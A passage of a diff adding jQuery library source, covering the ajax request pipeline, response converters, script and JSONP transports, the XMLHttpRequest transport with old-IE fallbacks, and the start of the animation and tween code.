+				cacheURL = ( s.url += ( ajax_rquery.test( cacheURL ) ? "&" : "?" ) + s.data );
+				// #9682: remove data so that it's not used in an eventual retry
+				delete s.data;
+			}
+
+			// Add anti-cache in url if needed
+			if ( s.cache === false ) {
+				s.url = rts.test( cacheURL ) ?
+
+					// If there is already a '_' parameter, set its value
+					cacheURL.replace( rts, "$1_=" + ajax_nonce++ ) :
+
+					// Otherwise add one to the end
+					cacheURL + ( ajax_rquery.test( cacheURL ) ? "&" : "?" ) + "_=" + ajax_nonce++;
+			}
+		}
+
+		// Set the If-Modified-Since and/or If-None-Match header, if in ifModified mode.
+		if ( s.ifModified ) {
+			if ( jQuery.lastModified[ cacheURL ] ) {
+				jqXHR.setRequestHeader( "If-Modified-Since", jQuery.lastModified[ cacheURL ] );
+			}
+			if ( jQuery.etag[ cacheURL ] ) {
+				jqXHR.setRequestHeader( "If-None-Match", jQuery.etag[ cacheURL ] );
+			}
+		}
+
+		// Set the correct header, if data is being sent
+		if ( s.data && s.hasContent && s.contentType !== false || options.contentType ) {
+			jqXHR.setRequestHeader( "Content-Type", s.contentType );
+		}
+
+		// Set the Accepts header for the server, depending on the dataType
+		jqXHR.setRequestHeader(
+			"Accept",
+			s.dataTypes[ 0 ] && s.accepts[ s.dataTypes[0] ] ?
+				s.accepts[ s.dataTypes[0] ] + ( s.dataTypes[ 0 ] !== "*" ? ", " + allTypes + "; q=0.01" : "" ) :
+				s.accepts[ "*" ]
+		);
+
+		// Check for headers option
+		for ( i in s.headers ) {
+			jqXHR.setRequestHeader( i, s.headers[ i ] );
+		}
+
+		// Allow custom headers/mimetypes and early abort
+		if ( s.beforeSend && ( s.beforeSend.call( callbackContext, jqXHR, s ) === false || state === 2 ) ) {
+			// Abort if not done already and return
+			return jqXHR.abort();
+		}
+
+		// aborting is no longer a cancellation
+		strAbort = "abort";
+
+		// Install callbacks on deferreds
+		for ( i in { success: 1, error: 1, complete: 1 } ) {
+			jqXHR[ i ]( s[ i ] );
+		}
+
+		// Get transport
+		transport = inspectPrefiltersOrTransports( transports, s, options, jqXHR );
+
+		// If no transport, we auto-abort
+		if ( !transport ) {
+			done( -1, "No Transport" );
+		} else {
+			jqXHR.readyState = 1;
+
+			// Send global event
+			if ( fireGlobals ) {
+				globalEventContext.trigger( "ajaxSend", [ jqXHR, s ] );
+			}
+			// Timeout
+			if ( s.async && s.timeout > 0 ) {
+				timeoutTimer = setTimeout(function() {
+					jqXHR.abort("timeout");
+				}, s.timeout );
+			}
+
+			try {
+				state = 1;
+				transport.send( requestHeaders, done );
+			} catch ( e ) {
+				// Propagate exception as error if not done
+				if ( state < 2 ) {
+					done( -1, e );
+				// Simply rethrow otherwise
+				} else {
+					throw e;
+				}
+			}
+		}
+
+		// Callback for when everything is done
+		function done( status, nativeStatusText, responses, headers ) {
+			var isSuccess, success, error, response, modified,
+				statusText = nativeStatusText;
+
+			// Called once
+			if ( state === 2 ) {
+				return;
+			}
+
+			// State is "done" now
+			state = 2;
+
+			// Clear timeout if it exists
+			if ( timeoutTimer ) {
+				clearTimeout( timeoutTimer );
+			}
+
+			// Dereference transport for early garbage collection
+			// (no matter how long the jqXHR object will be used)
+			transport = undefined;
+
+			// Cache response headers
+			responseHeadersString = headers || "";
+
+			// Set readyState
+			jqXHR.readyState = status > 0 ? 4 : 0;
+
+			// Determine if successful
+			isSuccess = status >= 200 && status < 300 || status === 304;
+
+			// Get response data
+			if ( responses ) {
+				response = ajaxHandleResponses( s, jqXHR, responses );
+			}
+
+			// Convert no matter what (that way responseXXX fields are always set)
+			response = ajaxConvert( s, response, jqXHR, isSuccess );
+
+			// If successful, handle type chaining
+			if ( isSuccess ) {
+
+				// Set the If-Modified-Since and/or If-None-Match header, if in ifModified mode.
+				if ( s.ifModified ) {
+					modified = jqXHR.getResponseHeader("Last-Modified");
+					if ( modified ) {
+						jQuery.lastModified[ cacheURL ] = modified;
+					}
+					modified = jqXHR.getResponseHeader("etag");
+					if ( modified ) {
+						jQuery.etag[ cacheURL ] = modified;
+					}
+				}
+
+				// if no content
+				if ( status === 204 || s.type === "HEAD" ) {
+					statusText = "nocontent";
+
+				// if not modified
+				} else if ( status === 304 ) {
+					statusText = "notmodified";
+
+				// If we have data, let's convert it
+				} else {
+					statusText = response.state;
+					success = response.data;
+					error = response.error;
+					isSuccess = !error;
+				}
+			} else {
+				// We extract error from statusText
+				// then normalize statusText and status for non-aborts
+				error = statusText;
+				if ( status || !statusText ) {
+					statusText = "error";
+					if ( status < 0 ) {
+						status = 0;
+					}
+				}
+			}
+
+			// Set data for the fake xhr object
+			jqXHR.status = status;
+			jqXHR.statusText = ( nativeStatusText || statusText ) + "";
+
+			// Success/Error
+			if ( isSuccess ) {
+				deferred.resolveWith( callbackContext, [ success, statusText, jqXHR ] );
+			} else {
+				deferred.rejectWith( callbackContext, [ jqXHR, statusText, error ] );
+			}
+
+			// Status-dependent callbacks
+			jqXHR.statusCode( statusCode );
+			statusCode = undefined;
+
+			if ( fireGlobals ) {
+				globalEventContext.trigger( isSuccess ? "ajaxSuccess" : "ajaxError",
+					[ jqXHR, s, isSuccess ? success : error ] );
+			}
+
+			// Complete
+			completeDeferred.fireWith( callbackContext, [ jqXHR, statusText ] );
+
+			if ( fireGlobals ) {
+				globalEventContext.trigger( "ajaxComplete", [ jqXHR, s ] );
+				// Handle the global AJAX counter
+				if ( !( --jQuery.active ) ) {
+					jQuery.event.trigger("ajaxStop");
+				}
+			}
+		}
+
+		return jqXHR;
+	},
+
+	getJSON: function( url, data, callback ) {
+		return jQuery.get( url, data, callback, "json" );
+	},
+
+	getScript: function( url, callback ) {
+		return jQuery.get( url, undefined, callback, "script" );
+	}
+});
+
+jQuery.each( [ "get", "post" ], function( i, method ) {
+	jQuery[ method ] = function( url, data, callback, type ) {
+		// shift arguments if data argument was omitted
+		if ( jQuery.isFunction( data ) ) {
+			type = type || callback;
+			callback = data;
+			data = undefined;
+		}
+
+		return jQuery.ajax({
+			url: url,
+			type: method,
+			dataType: type,
+			data: data,
+			success: callback
+		});
+	};
+});
+
+/* Handles responses to an ajax request:
+ * - finds the right dataType (mediates between content-type and expected dataType)
+ * - returns the corresponding response
+ */
+function ajaxHandleResponses( s, jqXHR, responses ) {
+	var firstDataType, ct, finalDataType, type,
+		contents = s.contents,
+		dataTypes = s.dataTypes;
+
+	// Remove auto dataType and get content-type in the process
+	while( dataTypes[ 0 ] === "*" ) {
+		dataTypes.shift();
+		if ( ct === undefined ) {
+			ct = s.mimeType || jqXHR.getResponseHeader("Content-Type");
+		}
+	}
+
+	// Check if we're dealing with a known content-type
+	if ( ct ) {
+		for ( type in contents ) {
+			if ( contents[ type ] && contents[ type ].test( ct ) ) {
+				dataTypes.unshift( type );
+				break;
+			}
+		}
+	}
+
+	// Check to see if we have a response for the expected dataType
+	if ( dataTypes[ 0 ] in responses ) {
+		finalDataType = dataTypes[ 0 ];
+	} else {
+		// Try convertible dataTypes
+		for ( type in responses ) {
+			if ( !dataTypes[ 0 ] || s.converters[ type + " " + dataTypes[0] ] ) {
+				finalDataType = type;
+				break;
+			}
+			if ( !firstDataType ) {
+				firstDataType = type;
+			}
+		}
+		// Or just use first one
+		finalDataType = finalDataType || firstDataType;
+	}
+
+	// If we found a dataType
+	// We add the dataType to the list if needed
+	// and return the corresponding response
+	if ( finalDataType ) {
+		if ( finalDataType !== dataTypes[ 0 ] ) {
+			dataTypes.unshift( finalDataType );
+		}
+		return responses[ finalDataType ];
+	}
+}
+
+/* Chain conversions given the request and the original response
+ * Also sets the responseXXX fields on the jqXHR instance
+ */
+function ajaxConvert( s, response, jqXHR, isSuccess ) {
+	var conv2, current, conv, tmp, prev,
+		converters = {},
+		// Work with a copy of dataTypes in case we need to modify it for conversion
+		dataTypes = s.dataTypes.slice();
+
+	// Create converters map with lowercased keys
+	if ( dataTypes[ 1 ] ) {
+		for ( conv in s.converters ) {
+			converters[ conv.toLowerCase() ] = s.converters[ conv ];
+		}
+	}
+
+	current = dataTypes.shift();
+
+	// Convert to each sequential dataType
+	while ( current ) {
+
+		if ( s.responseFields[ current ] ) {
+			jqXHR[ s.responseFields[ current ] ] = response;
+		}
+
+		// Apply the dataFilter if provided
+		if ( !prev && isSuccess && s.dataFilter ) {
+			response = s.dataFilter( response, s.dataType );
+		}
+
+		prev = current;
+		current = dataTypes.shift();
+
+		if ( current ) {
+
+			// There's only work to do if current dataType is non-auto
+			if ( current === "*" ) {
+
+				current = prev;
+
+			// Convert response if prev dataType is non-auto and differs from current
+			} else if ( prev !== "*" && prev !== current ) {
+
+				// Seek a direct converter
+				conv = converters[ prev + " " + current ] || converters[ "* " + current ];
+
+				// If none found, seek a pair
+				if ( !conv ) {
+					for ( conv2 in converters ) {
+
+						// If conv2 outputs current
+						tmp = conv2.split( " " );
+						if ( tmp[ 1 ] === current ) {
+
+							// If prev can be converted to accepted input
+							conv = converters[ prev + " " + tmp[ 0 ] ] ||
+								converters[ "* " + tmp[ 0 ] ];
+							if ( conv ) {
+								// Condense equivalence converters
+								if ( conv === true ) {
+									conv = converters[ conv2 ];
+
+								// Otherwise, insert the intermediate dataType
+								} else if ( converters[ conv2 ] !== true ) {
+									current = tmp[ 0 ];
+									dataTypes.unshift( tmp[ 1 ] );
+								}
+								break;
+							}
+						}
+					}
+				}
+
+				// Apply converter (if not an equivalence)
+				if ( conv !== true ) {
+
+					// Unless errors are allowed to bubble, catch and return them
+					if ( conv && s[ "throws" ] ) {
+						response = conv( response );
+					} else {
+						try {
+							response = conv( response );
+						} catch ( e ) {
+							return { state: "parsererror", error: conv ? e : "No conversion from " + prev + " to " + current };
+						}
+					}
+				}
+			}
+		}
+	}
+
+	return { state: "success", data: response };
+}
+// Install script dataType
+jQuery.ajaxSetup({
+	accepts: {
+		script: "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"
+	},
+	contents: {
+		script: /(?:java|ecma)script/
+	},
+	converters: {
+		"text script": function( text ) {
+			jQuery.globalEval( text );
+			return text;
+		}
+	}
+});
+
+// Handle cache's special case and global
+jQuery.ajaxPrefilter( "script", function( s ) {
+	if ( s.cache === undefined ) {
+		s.cache = false;
+	}
+	if ( s.crossDomain ) {
+		s.type = "GET";
+		s.global = false;
+	}
+});
+
+// Bind script tag hack transport
+jQuery.ajaxTransport( "script", function(s) {
+
+	// This transport only deals with cross domain requests
+	if ( s.crossDomain ) {
+
+		var script,
+			head = document.head || jQuery("head")[0] || document.documentElement;
+
+		return {
+
+			send: function( _, callback ) {
+
+				script = document.createElement("script");
+
+				script.async = true;
+
+				if ( s.scriptCharset ) {
+					script.charset = s.scriptCharset;
+				}
+
+				script.src = s.url;
+
+				// Attach handlers for all browsers
+				script.onload = script.onreadystatechange = function( _, isAbort ) {
+
+					if ( isAbort || !script.readyState || /loaded|complete/.test( script.readyState ) ) {
+
+						// Handle memory leak in IE
+						script.onload = script.onreadystatechange = null;
+
+						// Remove the script
+						if ( script.parentNode ) {
+							script.parentNode.removeChild( script );
+						}
+
+						// Dereference the script
+						script = null;
+
+						// Callback if not abort
+						if ( !isAbort ) {
+							callback( 200, "success" );
+						}
+					}
+				};
+
+				// Circumvent IE6 bugs with base elements (#2709 and #4378) by prepending
+				// Use native DOM manipulation to avoid our domManip AJAX trickery
+				head.insertBefore( script, head.firstChild );
+			},
+
+			abort: function() {
+				if ( script ) {
+					script.onload( undefined, true );
+				}
+			}
+		};
+	}
+});
+var oldCallbacks = [],
+	rjsonp = /(=)\?(?=&|$)|\?\?/;
+
+// Default jsonp settings
+jQuery.ajaxSetup({
+	jsonp: "callback",
+	jsonpCallback: function() {
+		var callback = oldCallbacks.pop() || ( jQuery.expando + "_" + ( ajax_nonce++ ) );
+		this[ callback ] = true;
+		return callback;
+	}
+});
+
+// Detect, normalize options and install callbacks for jsonp requests
+jQuery.ajaxPrefilter( "json jsonp", function( s, originalSettings, jqXHR ) {
+
+	var callbackName, overwritten, responseContainer,
+		jsonProp = s.jsonp !== false && ( rjsonp.test( s.url ) ?
+			"url" :
+			typeof s.data === "string" && !( s.contentType || "" ).indexOf("application/x-www-form-urlencoded") && rjsonp.test( s.data ) && "data"
+		);
+
+	// Handle iff the expected data type is "jsonp" or we have a parameter to set
+	if ( jsonProp || s.dataTypes[ 0 ] === "jsonp" ) {
+
+		// Get callback name, remembering preexisting value associated with it
+		callbackName = s.jsonpCallback = jQuery.isFunction( s.jsonpCallback ) ?
+			s.jsonpCallback() :
+			s.jsonpCallback;
+
+		// Insert callback into url or form data
+		if ( jsonProp ) {
+			s[ jsonProp ] = s[ jsonProp ].replace( rjsonp, "$1" + callbackName );
+		} else if ( s.jsonp !== false ) {
+			s.url += ( ajax_rquery.test( s.url ) ? "&" : "?" ) + s.jsonp + "=" + callbackName;
+		}
+
+		// Use data converter to retrieve json after script execution
+		s.converters["script json"] = function() {
+			if ( !responseContainer ) {
+				jQuery.error( callbackName + " was not called" );
+			}
+			return responseContainer[ 0 ];
+		};
+
+		// force json dataType
+		s.dataTypes[ 0 ] = "json";
+
+		// Install callback
+		overwritten = window[ callbackName ];
+		window[ callbackName ] = function() {
+			responseContainer = arguments;
+		};
+
+		// Clean-up function (fires after converters)
+		jqXHR.always(function() {
+			// Restore preexisting value
+			window[ callbackName ] = overwritten;
+
+			// Save back as free
+			if ( s[ callbackName ] ) {
+				// make sure that re-using the options doesn't screw things around
+				s.jsonpCallback = originalSettings.jsonpCallback;
+
+				// save the callback name for future use
+				oldCallbacks.push( callbackName );
+			}
+
+			// Call if it was a function and we have a response
+			if ( responseContainer && jQuery.isFunction( overwritten ) ) {
+				overwritten( responseContainer[ 0 ] );
+			}
+
+			responseContainer = overwritten = undefined;
+		});
+
+		// Delegate to script
+		return "script";
+	}
+});
+var xhrCallbacks, xhrSupported,
+	xhrId = 0,
+	// #5280: Internet Explorer will keep connections alive if we don't abort on unload
+	xhrOnUnloadAbort = window.ActiveXObject && function() {
+		// Abort all pending requests
+		var key;
+		for ( key in xhrCallbacks ) {
+			xhrCallbacks[ key ]( undefined, true );
+		}
+	};
+
+// Functions to create xhrs
+function createStandardXHR() {
+	try {
+		return new window.XMLHttpRequest();
+	} catch( e ) {}
+}
+
+function createActiveXHR() {
+	try {
+		return new window.ActiveXObject("Microsoft.XMLHTTP");
+	} catch( e ) {}
+}
+
+// Create the request object
+// (This is still attached to ajaxSettings for backward compatibility)
+jQuery.ajaxSettings.xhr = window.ActiveXObject ?
+	/* Microsoft failed to properly
+	 * implement the XMLHttpRequest in IE7 (can't request local files),
+	 * so we use the ActiveXObject when it is available
+	 * Additionally XMLHttpRequest can be disabled in IE7/IE8 so
+	 * we need a fallback.
+	 */
+	function() {
+		return !this.isLocal && createStandardXHR() || createActiveXHR();
+	} :
+	// For all other browsers, use the standard XMLHttpRequest object
+	createStandardXHR;
+
+// Determine support properties
+xhrSupported = jQuery.ajaxSettings.xhr();
+jQuery.support.cors = !!xhrSupported && ( "withCredentials" in xhrSupported );
+xhrSupported = jQuery.support.ajax = !!xhrSupported;
+
+// Create transport if the browser can provide an xhr
+if ( xhrSupported ) {
+
+	jQuery.ajaxTransport(function( s ) {
+		// Cross domain only allowed if supported through XMLHttpRequest
+		if ( !s.crossDomain || jQuery.support.cors ) {
+
+			var callback;
+
+			return {
+				send: function( headers, complete ) {
+
+					// Get a new xhr
+					var handle, i,
+						xhr = s.xhr();
+
+					// Open the socket
+					// Passing null username, generates a login popup on Opera (#2865)
+					if ( s.username ) {
+						xhr.open( s.type, s.url, s.async, s.username, s.password );
+					} else {
+						xhr.open( s.type, s.url, s.async );
+					}
+
+					// Apply custom fields if provided
+					if ( s.xhrFields ) {
+						for ( i in s.xhrFields ) {
+							xhr[ i ] = s.xhrFields[ i ];
+						}
+					}
+
+					// Override mime type if needed
+					if ( s.mimeType && xhr.overrideMimeType ) {
+						xhr.overrideMimeType( s.mimeType );
+					}
+
+					// X-Requested-With header
+					// For cross-domain requests, seeing as conditions for a preflight are
+					// akin to a jigsaw puzzle, we simply never set it to be sure.
+					// (it can always be set on a per-request basis or even using ajaxSetup)
+					// For same-domain requests, won't change header if already provided.
+					if ( !s.crossDomain && !headers["X-Requested-With"] ) {
+						headers["X-Requested-With"] = "XMLHttpRequest";
+					}
+
+					// Need an extra try/catch for cross domain requests in Firefox 3
+					try {
+						for ( i in headers ) {
+							xhr.setRequestHeader( i, headers[ i ] );
+						}
+					} catch( err ) {}
+
+					// Do send the request
+					// This may raise an exception which is actually
+					// handled in jQuery.ajax (so no try/catch here)
+					xhr.send( ( s.hasContent && s.data ) || null );
+
+					// Listener
+					callback = function( _, isAbort ) {
+						var status, responseHeaders, statusText, responses;
+
+						// Firefox throws exceptions when accessing properties
+						// of an xhr when a network error occurred
+						// http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)
+						try {
+
+							// Was never called and is aborted or complete
+							if ( callback && ( isAbort || xhr.readyState === 4 ) ) {
+
+								// Only called once
+								callback = undefined;
+
+								// Do not keep as active anymore
+								if ( handle ) {
+									xhr.onreadystatechange = jQuery.noop;
+									if ( xhrOnUnloadAbort ) {
+										delete xhrCallbacks[ handle ];
+									}
+								}
+
+								// If it's an abort
+								if ( isAbort ) {
+									// Abort it manually if needed
+									if ( xhr.readyState !== 4 ) {
+										xhr.abort();
+									}
+								} else {
+									responses = {};
+									status = xhr.status;
+									responseHeaders = xhr.getAllResponseHeaders();
+
+									// When requesting binary data, IE6-9 will throw an exception
+									// on any attempt to access responseText (#11426)
+									if ( typeof xhr.responseText === "string" ) {
+										responses.text = xhr.responseText;
+									}
+
+									// Firefox throws an exception when accessing
+									// statusText for faulty cross-domain requests
+									try {
+										statusText = xhr.statusText;
+									} catch( e ) {
+										// We normalize with Webkit giving an empty statusText
+										statusText = "";
+									}
+
+									// Filter status for non standard behaviors
+
+									// If the request is local and we have data: assume a success
+									// (success with no data won't get notified, that's the best we
+									// can do given current implementations)
+									if ( !status && s.isLocal && !s.crossDomain ) {
+										status = responses.text ? 200 : 404;
+									// IE - #1450: sometimes returns 1223 when it should be 204
+									} else if ( status === 1223 ) {
+										status = 204;
+									}
+								}
+							}
+						} catch( firefoxAccessException ) {
+							if ( !isAbort ) {
+								complete( -1, firefoxAccessException );
+							}
+						}
+
+						// Call complete if needed
+						if ( responses ) {
+							complete( status, statusText, responses, responseHeaders );
+						}
+					};
+
+					if ( !s.async ) {
+						// if we're in sync mode we fire the callback
+						callback();
+					} else if ( xhr.readyState === 4 ) {
+						// (IE6 & IE7) if it's in cache and has been
+						// retrieved directly we need to fire the callback
+						setTimeout( callback );
+					} else {
+						handle = ++xhrId;
+						if ( xhrOnUnloadAbort ) {
+							// Create the active xhrs callbacks list if needed
+							// and attach the unload handler
+							if ( !xhrCallbacks ) {
+								xhrCallbacks = {};
+								jQuery( window ).unload( xhrOnUnloadAbort );
+							}
+							// Add to list of active xhrs callbacks
+							xhrCallbacks[ handle ] = callback;
+						}
+						xhr.onreadystatechange = callback;
+					}
+				},
+
+				abort: function() {
+					if ( callback ) {
+						callback( undefined, true );
+					}
+				}
+			};
+		}
+	});
+}
+var fxNow, timerId,
+	rfxtypes = /^(?:toggle|show|hide)$/,
+	rfxnum = new RegExp( "^(?:([+-])=|)(" + core_pnum + ")([a-z%]*)$", "i" ),
+	rrun = /queueHooks$/,
+	animationPrefilters = [ defaultPrefilter ],
+	tweeners = {
+		"*": [function( prop, value ) {
+			var tween = this.createTween( prop, value ),
+				target = tween.cur(),
+				parts = rfxnum.exec( value ),
+				unit = parts && parts[ 3 ] || ( jQuery.cssNumber[ prop ] ? "" : "px" ),
+
+				// Starting value computation is required for potential unit mismatches
+				start = ( jQuery.cssNumber[ prop ] || unit !== "px" && +target ) &&
+					rfxnum.exec( jQuery.css( tween.elem, prop ) ),
+				scale = 1,
+				maxIterations = 20;
+
+			if ( start && start[ 3 ] !== unit ) {
+				// Trust units reported by jQuery.css
+				unit = unit || start[ 3 ];
+
+				// Make sure we update the tween properties later on
+				parts = parts || [];
+
+				// Iteratively approximate from a nonzero starting point
+				start = +target || 1;
+
+				do {
+					// If previous iteration zeroed out, double until we get *something*
+					// Use a string for doubling factor so we don't accidentally see scale as unchanged below
+					scale = scale || ".5";
+
+					// Adjust and apply
+					start = start / scale;
+					jQuery.style( tween.elem, prop, start + unit );
+
+				// Update scale, tolerating zero or NaN from tween.cur()
+				// And breaking the loop if scale is unchanged or perfect, or if we've just had enough
+				} while ( scale !== (scale = tween.cur() / target) && scale !== 1 && --maxIterations );
+			}
+
+			// Update tween properties
+			if ( parts ) {
+				start = tween.start = +start || +target || 0;
+				tween.unit = unit;
+				// If a +=/-= token was provided, we're doing a relative animation
+				tween.end = parts[ 1 ] ?
+					start + ( parts[ 1 ] + 1 ) * parts[ 2 ] :
+					+parts[ 2 ];
+			}
+
+			return tween;
+		}]
+	};
+
+// Animations created synchronously will run synchronously
+function createFxNow() {
+	setTimeout(function() {
+		fxNow = undefined;
+	});
+	return ( fxNow = jQuery.now() );
+}
+
+function createTween( value, prop, animation ) {
+	var tween,
+		collection = ( tweeners[ prop ] || [] ).concat( tweeners[ "*" ] ),
+		index = 0,
+		length = collection.length;
+	for ( ; index < length; index++ ) {
+		if ( (tween = collection[ index ].call( animation, prop, value )) ) {
+
+			// we're done with this property
+			return tween;
+		}
+	}
+}
+
+function Animation( elem, properties, options ) {
+	var result,
+		stopped,
+		index = 0,
+		length = animationPrefilters.length,
+		deferred = jQuery.Deferred().always( function() {
+			// don't match elem in the :animated selector
+			delete tick.elem;
+		}),
+		tick = function() {
+			if ( stopped ) {
+				return false;
+			}
+			var currentTime = fxNow || createFxNow(),
+				remaining = Math.max( 0, animation.startTime + animation.duration - currentTime ),
+				// archaic crash bug won't allow us to use 1 - ( 0.5 || 0 ) (#12497)
+				temp = remaining / animation.duration || 0,
+				percent = 1 - temp,
+				index = 0,
+				length = animation.tweens.length;
+
+			for ( ; index < length ; index++ ) {
+				animation.tweens[ index ].run( percent );
+			}
+
+			deferred.notifyWith( elem, [ animation, percent, remaining ]);
+
+			if ( percent < 1 && length ) {
+				return remaining;
+			} else {
+				deferred.resolveWith( elem, [ animation ] );
+				return false;
+			}
+		},
+		animation = deferred.promise({
+			elem: elem,
+			props: jQuery.extend( {}, properties ),
+			opts: jQuery.extend( true, { specialEasing: {} }, options ),
+			originalProperties: properties,
+			originalOptions: options,
+			startTime: fxNow || createFxNow(),
+			duration: options.duration,
+			tweens: [],
+			createTween: function( prop, end ) {
+				var tween = jQuery.Tween( elem, animation.opts, prop, end,
+						animation.opts.specialEasing[ prop ] || animation.opts.easing );
+				animation.tweens.push( tween );
+				return tween;
+			},
+			stop: function( gotoEnd ) {
+				var index = 0,
+					// if we are going to the end, we want to run all the tweens
+					// otherwise we skip this part
+					length = gotoEnd ? animation.tweens.length : 0;
+				if ( stopped ) {
+					return this;
+				}
+				stopped = true;
+				for ( ; index < length ; index++ ) {
+					animation.tweens[ index ].run( 1 );
+				}
+
+				// resolve when we played the last frame
+				// otherwise, reject
+				if ( gotoEnd ) {
+					deferred.resolveWith( elem, [ animation, gotoEnd ] );
+				} else {
+					deferred.rejectWith( elem, [ animation, gotoEnd ] );
+				}
+				return this;
+			}
+		}),
+		props = animation.props;
+
+	propFilter( props, animation.opts.specialEasing );
+
+	for ( ; index < length ; index++ ) {
+		result = animationPrefilters[ index ].call( animation, elem, props, animation.opts );
+		if ( result ) {
+			return result;
+		}
+	}
+
+	jQuery.map( props, createTween, animation );
+
+	if ( jQuery.isFunction( animation.opts.start ) ) {
+		animation.opts.start.call( elem, animation );
+	}
+
+	jQuery.fx.timer(
+		jQuery.extend( tick, {
+			elem: elem,
+			anim: animation,
+			queue: animation.opts.queue
+		})
+	);
+
+	// attach callbacks from options
+	return animation.progress( animation.opts.progress )
+		.done( animation.opts.done, animation.opts.complete )
+		.fail( animation.opts.fail )
+		.always( animation.opts.always );
+}
+
+function propFilter( props, specialEasing ) {
+	var index, name, easing, value, hooks;
+
+	// camelCase, specialEasing and expand cssHook pass
+	for ( index in props ) {
+		name = jQuery.camelCase( index );
+		easing = specialEasing[ name ];
+		value = props[ index ];
+		if ( jQuery.isArray( value ) ) {
+			easing = value[ 1 ];
+			value = props[ index ] = value[ 0 ];
+		}
+
+		if ( index !== name ) {
+			props[ name ] = value;
+			delete props[ index ];
+		}
+
+		hooks = jQuery.cssHooks[ name ];
+		if ( hooks && "expand" in hooks ) {
+			value = hooks.expand( value );
+			delete props[ name ];
+
+			// not quite $.extend, this wont overwrite keys already present.
+			// also - reusing 'index' from above because we have the correct "name"
+			for ( index in value ) {
+				if ( !( index in props ) ) {
+					props[ index ] = value[ index ];
+					specialEasing[ index ] = easing;
+				}
+			}
+		} else {
+			specialEasing[ name ] = easing;
+		}
+	}
+}
+
+jQuery.Animation = jQuery.extend( Animation, {
+
+	tweener: function( props, callback ) {
+		if ( jQuery.isFunction( props ) ) {
+			callback = props;
+			props = [ "*" ];
+		} else {
+			props = props.split(" ");
+		}
+
+		var prop,
+			index = 0,
+			length = props.length;
+
+		for ( ; index < length ; index++ ) {
+			prop = props[ index ];
+			tweeners[ prop ] = tweeners[ prop ] || [];
+			tweeners[ prop ].unshift( callback );
+		}
+	},
+
+	prefilter: function( callback, prepend ) {
+		if ( prepend ) {
+			animationPrefilters.unshift( callback );
+		} else {
+			animationPrefilters.push( callback );
+		}
+	}
+});
+
+function defaultPrefilter( elem, props, opts ) {
+	/* jshint validthis: true */
+	var prop, value, toggle, tween, hooks, oldfire,
+		anim = this,
+		orig = {},
+		style = elem.style,
+		hidden = elem.nodeType && isHidden( elem ),
+		dataShow = jQuery._data( elem, "fxshow" );
+
+	// handle queue: false promises
+	if ( !opts.queue ) {
+		hooks = jQuery._queueHooks( elem, "fx" );
+		if ( hooks.unqueued == null ) {
+			hooks.unqueued = 0;
+			oldfire = hooks.empty.fire;
+			hooks.empty.fire = function() {
+				if ( !hooks.unqueued ) {
+					oldfire();
+				}
+			};
+		}
+		hooks.unqueued++;
+
+		anim.always(function() {
+			// doing this makes sure that the complete handler will be called
+			// before this completes
+			anim.always(function() {
+				hooks.unqueued--;
+				if ( !jQuery.queue( elem, "fx" ).length ) {
+					hooks.empty.fire();
+				}
+			});
+		});
+	}
+
+	// height/width overflow pass
+	if ( elem.nodeType === 1 && ( "height" in props || "width" in props ) ) {
+		// Make sure that nothing sneaks out
+		// Record all 3 overflow attributes because IE does not
+		// change the overflow attribute when overflowX and
+		// overflowY are set to the same value
+		opts.overflow = [ style.overflow, style.overflowX, style.overflowY ];
+
+		// Set display property to inline-block for height/width
+		// animations on inline elements that are having width/height animated
+		if ( jQuery.css( elem, "display" ) === "inline" &&
+				jQuery.css( elem, "float" ) === "none" ) {
+
+			// inline-level elements accept inline-block;
+			// block-level elements need to be inline with layout
+			if ( !jQuery.support.inlineBlockNeedsLayout || css_defaultDisplay( elem.nodeName ) === "inline" ) {
+				style.display = "inline-block";
+
+			} else {
+				style.zoom = 1;
+			}
+		}
+	}
+
+	if ( opts.overflow ) {
+		style.overflow = "hidden";
+		if ( !jQuery.support.shrinkWrapBlocks ) {
+			anim.always(function() {
+				style.overflow = opts.overflow[ 0 ];
+				style.overflowX = opts.overflow[ 1 ];
+				style.overflowY = opts.overflow[ 2 ];
+			});
+		}
+	}
+
+
+	// show/hide pass
+	for ( prop in props ) {
+		value = props[ prop ];
+		if ( rfxtypes.exec( value ) ) {
+			delete props[ prop ];
+			toggle = toggle || value === "toggle";
+			if ( value === ( hidden ? "hide" : "show" ) ) {
+				continue;
+			}
+			orig[ prop ] = dataShow && dataShow[ prop ] || jQuery.style( elem, prop );
+		}
+	}
+
+	if ( !jQuery.isEmptyObject( orig ) ) {
+		if ( dataShow ) {
+			if ( "hidden" in dataShow ) {
+				hidden = dataShow.hidden;
+			}
+		} else {
+			dataShow = jQuery._data( elem, "fxshow", {} );
+		}
+
+		// store state if its toggle - enables .stop().toggle() to "reverse"
+		if ( toggle ) {
+			dataShow.hidden = !hidden;
+		}
+		if ( hidden ) {
+			jQuery( elem ).show();
+		} else {
+			anim.done(function() {
+				jQuery( elem ).hide();
+			});
+		}
+		anim.done(function() {
+			var prop;
+			jQuery._removeData( elem, "fxshow" );
+			for ( prop in orig ) {
+				jQuery.style( elem, prop, orig[ prop ] );
+			}
+		});
+		for ( prop in orig ) {
+			tween = createTween( hidden ? dataShow[ prop ] : 0, prop, anim );
+
+			if ( !( prop in dataShow ) ) {
+				dataShow[ prop ] = tween.start;
+				if ( hidden ) {
+					tween.end = tween.start;
+					tween.start = prop === "width" || prop === "height" ? 1 : 0;
+				}
+			}
+		}
+	}
+}
+
+function Tween( elem, options, prop, end, easing ) {
+	return new Tween.prototype.init( elem, options, prop, end, easing );
+}
+jQuery.Tween = Tween;
+
+Tween.prototype = {
+	constructor: Tween,
+	init: function( elem, options, prop, end, easing, unit ) {
+		this.elem = elem;
+		this.prop = prop;
+		this.easing = easing || "swing";
+		this.options = options;
+		this.start = this.now = this.cur();
+		this.end = end;
+		this.unit = unit || ( jQuery.cssNumber[ prop ] ? "" : "px" );
+	},
+	cur: function() {
+		var hooks = Tween.propHooks[ this.prop ];
+
+		return hooks && hooks.get ?
+			hooks.get( this ) :
+			Tween.propHooks._default.get( this );
+	},
+	run: function( percent ) {
+		var eased,
+			hooks = Tween.propHooks[ this.prop ];
+
+		if ( this.options.duration ) {
+			this.pos = eased = jQuery.easing[ this.easing ](
+				percent, this.options.duration * percent, 0, 1, this.options.duration
+			);
+		} else {
+			this.pos = eased = percent;
+		}
+		this.now = ( this.end - this.start ) * eased + this.start;
+
+		if ( this.options.step ) {
+			this.options.step.call( this.elem, this.now, this );
+		}
+
